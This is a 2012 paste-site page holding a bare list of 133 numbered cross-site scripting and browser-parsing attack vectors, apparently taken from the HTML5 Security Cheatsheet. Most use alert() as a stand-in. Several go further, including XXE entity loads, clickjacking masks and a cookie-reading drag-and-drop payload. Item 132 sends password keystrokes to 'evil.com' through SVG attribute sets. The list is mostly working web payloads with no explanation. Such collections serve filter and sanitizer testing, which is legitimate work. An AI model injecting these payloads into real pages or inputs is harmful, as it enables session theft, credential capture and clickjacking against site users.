Don't like ads? PRO users don't see any ads ;-)
Guest

Untitled

By: a guest on Jun 14th, 2012  |  syntax: HTML 5  |  size: 20.46 KB  |  hits: 472  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div>
  2.  
  3. <div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div>
  4.  
  5. <div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div>
  6.  
  7. <div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div>
  8.  
  9. <div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div>
  10.  
  11. <div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div>
  12.  
  13. <div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div>
  14.  
  15. <div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div>
  16.  
  17. <div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div>
  18.  
  19. <div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div>
  20.  
  21. <div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div>
  22.  
  23. <div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div>
  24.  
  25. <div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div>
  26.  
  27. <div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div>
  28.  
  29. <div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div>
  30.  
  31. <div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div>
  32.  
  33. <div id="17"><?xml-stylesheet href="javascript:alert(17)"?>//["'`-->]]>]</div>
  34.  
  35. <div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div>
  36.  
  37. <div id="19"><meta charset="mac-farsi">¼script¾alert(19)¼/script¾//["'`-->]]>]</div>
  38.  
  39. <div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div>
  40.  
  41. <div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div>
  42.  
  43. <div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div>
  44.  
  45. <div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div>
  46.  
  47. <div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div>
  48.  
  49. <div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div>
  50.  
  51. <div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div>
  52.  
  53. <div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}]{color:red};</style>//["'`-->]]>]</div>
  54.  
  55. <div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div>
  56.  
  57. <div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div>
  58.  
  59. <div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div>
  60.  
  61. <div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div>
  62.  
  63. <div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div>
  64.  
  65. <div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div>
  66.  
  67. <div id="34"><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div>
  68.  
  69. <div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div>
  70.  
  71. <div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div>
  72.  
  73. <div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div>
  74.  
  75. <div id="38"><comment><img src="</comment><img src=x onerror=alert(38))//">//["'`-->]]>]</div>
  76.  
  77. <div id="39"><![><img src="]><img src=x onerror=alert(39)//">//["'`-->]]>]</div>
  78.  
  79. <div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
  80.  
  81. <div id="41"><li style=list-style:url() onerror=alert(41)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>
  82.  
  83. <div id="42"><head><base href="javascript://"></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
  84.  
  85. <div id="43"><?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>//["'`-->]]>]</div>
  86.  
  87. <div id="44"><style>*[{}@import'test.css?]</style>X//["'`-->]]>]</div>
  88.  
  89. <div id="45"><div style="font-family:'foo&#10;;color:red;';">XXX</div>//["'`-->]]>]</div>
  90.  
  91. <div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div>
  92.  
  93. <div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div>
  94.  
  95. <div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div>
  96.  
  97. <div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div>
  98.  
  99. <div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div>
  100.  
  101. <div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div>
  102.  
  103. <div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>
  104.  
  105. <div id="53"><xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>
  106.  
  107. <div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div>
  108.  
  109. <div id="55"><video><source onerror="javascript:alert(55)">//["'`-->]]>]</div>
  110.  
  111. <div id="56"><video onerror="javascript:alert(56)"><source></source></video>//["'`-->]]>]</div>
  112.  
  113. <div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div>
  114.  
  115. <div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div>
  116.  
  117. <div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div>
  118.  
  119. <div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
  120.  
  121. <div id="61"><a x="javasc&#x0Aript:alert(61)" style="\000062\00065\68\0\00 \&#xA0\000061 vio\r:url\28#default#time2);\-\ \ \00006D\0006f\7A\2d \62 \000069 \06E din\g:url(test.xbl#xss);\-\00006F\0002d\6C \69 \6e \00006B:attr(x);\-\00006F\0002d\6C \69 \6e \00006B-s\ource:current" end=0 onend=alert(61)>XXX</a>//["'`-->]]>]</div>
  122.  
  123. <div id="62"><x '="foo"><x foo='><img src=x onerror=alert(62)//'>//["'`-->]]>]</div>
  124.  
  125. <div id="63"><embed src="javascript:alert(63)"></embed> <img src="javascript:alert(63)"> <image src="javascript:alert(63)"> <script src="javascript:alert(63)"></script>//["'`-->]]>]</div>
  126.  
  127. <div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "test.xxe">]><y>&x;</y>//["'`-->]]>]</div>
  128.  
  129. <div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>
  130.  
  131. <div id="66"><?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>//["'`-->]]>]</div>
  132.  
  133. <div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "x" onerror CDATA "alert(67)"> ]><img />//["'`-->]]>]</div>
  134.  
  135. <div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x> </doc>//["'`-->]]>]</div>
  136.  
  137. <div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div>
  138.  
  139. <div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div>
  140.  
  141. <div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div>
  142.  
  143. <div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div>
  144.  
  145. <div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div>
  146.  
  147. <div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div>
  148.  
  149. <div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div>
  150.  
  151. <div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div>
  152.  
  153. <div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div>
  154.  
  155. <div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div>
  156.  
  157. <div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div>
  158.  
  159. <div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div>
  160.  
  161. <div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div>
  162.  
  163. <div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>
  164.  
  165. <div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>
  166.  
  167. <div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div>
  168.  
  169. <div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div>
  170.  
  171. <div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>
  172.  
  173. <div id="87"><svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> </svg>//["'`-->]]>]</div>
  174.  
  175. <div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(88)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(88)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> </svg>//["'`-->]]>]</div>
  176.  
  177. <div id="89"><svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(89)"/> <animate attributeName="onunload" to="alert(89)"/> </svg>//["'`-->]]>]</div>
  178.  
  179. <div id="90"><div style=content:url(test2.svg)></div>//["'`-->]]>]</div>
  180.  
  181. <div id="91">[A] <? foo="><script>alert(91)</script>"> <! foo="><script>alert(91)</script>"> </ foo="><script>alert(91)</script>"> [B] <? foo="><x foo='?><script>alert(91)</script>'>"> [C] <! foo="[[[Inception]]"><x foo="]foo><script>alert(91)</script>"> [D] <% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>
  182.  
  183. <div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
  184.  
  185. <div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>
  186.  
  187. <div id="94"><svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> </svg>//["'`-->]]>]</div>
  188.  
  189. <div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>//["'`-->]]>]</div>
  190.  
  191. <div id="96">mhtml:http://html5sec.org/test.html!xss.html mhtml:http://html5sec.org/test.gif!xss.html//["'`-->]]>]</div>
  192.  
  193. <div id="97"><div id=d><x xmlns="><iframe onload=alert(97)"></div> <script>d.innerHTML=d.innerHTML</script>//["'`-->]]>]</div>
  194.  
  195. <div id="98"><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>
  196.  
  197. <div id="99">XXX<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>//["'`-->]]>]</div>
  198.  
  199. <div id="100"><img[a][b][c]src[d]=x[e]onerror=[f]"alert(100)">//["'`-->]]>]</div>
  200.  
  201. <div id="101"><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:alert(101)>XXX</a>//["'`-->]]>]</div>
  202.  
  203. <div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div>
  204.  
  205. <div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>
  206.  
  207. <div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>//["'`-->]]>]</div>
  208.  
  209. <div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div>
  210.  
  211. <div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div>
  212.  
  213. <div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>
  214.  
  215. <div id="108"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(108)></a>">//["'`-->]]>]</div>
  216.  
  217. <div id="109"><svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>//["'`-->]]>]</div>
  218.  
  219. <div id="110"><svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>//["'`-->]]>]</div>
  220.  
  221. <div id="111"><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
  222.  
  223. <div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
  224.  
  225. <div id="113"><div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>//["'`-->]]>]</div>
  226.  
  227. <div id="114"><x style="background:url('x&#1;;color:red;/*')">XXX</x>//["'`-->]]>]</div>
  228.  
  229. <div id="115"><!--[if]><script>alert(115)</script --> <!--[if<img src=x onerror=alert(115)//]> -->//["'`-->]]>]</div>
  230.  
  231. <div id="116"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>
  232.  
  233. <div id="117"><a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>//["'`-->]]>]</div>
  234.  
  235. <div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>
  236.  
  237. <div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>
  238.  
  239. <div id="120"><script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>
  240.  
  241. <div id="121"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>//["'`-->]]>]</div>
  242.  
  243. <div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>
  244.  
  245. <div id="123"><span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>//["'`-->]]>]</div>
  246.  
  247. <div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>
  248.  
  249. <div id="125"><?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>//["'`-->]]>]</div>
  250.  
  251. <div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>
  252.  
  253. <div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(127)</handler> </svg>//["'`-->]]>]</div>
  254.  
  255. <div id="128"><svg><style>&ltimg/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>
  256.  
  257. <div id="129"><svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>//["'`-->]]>]</div>
  258.  
  259. <div id="130"><math href="javascript:alert(130)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(130)">CLICKME</maction> </math>//["'`-->]]>]</div>
  260.  
  261. <div id="131"><b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>
  262.  
  263. <div id="132"><!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /> </image> </svg>//["'`-->]]>]</div>
  264.  
  265. <div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>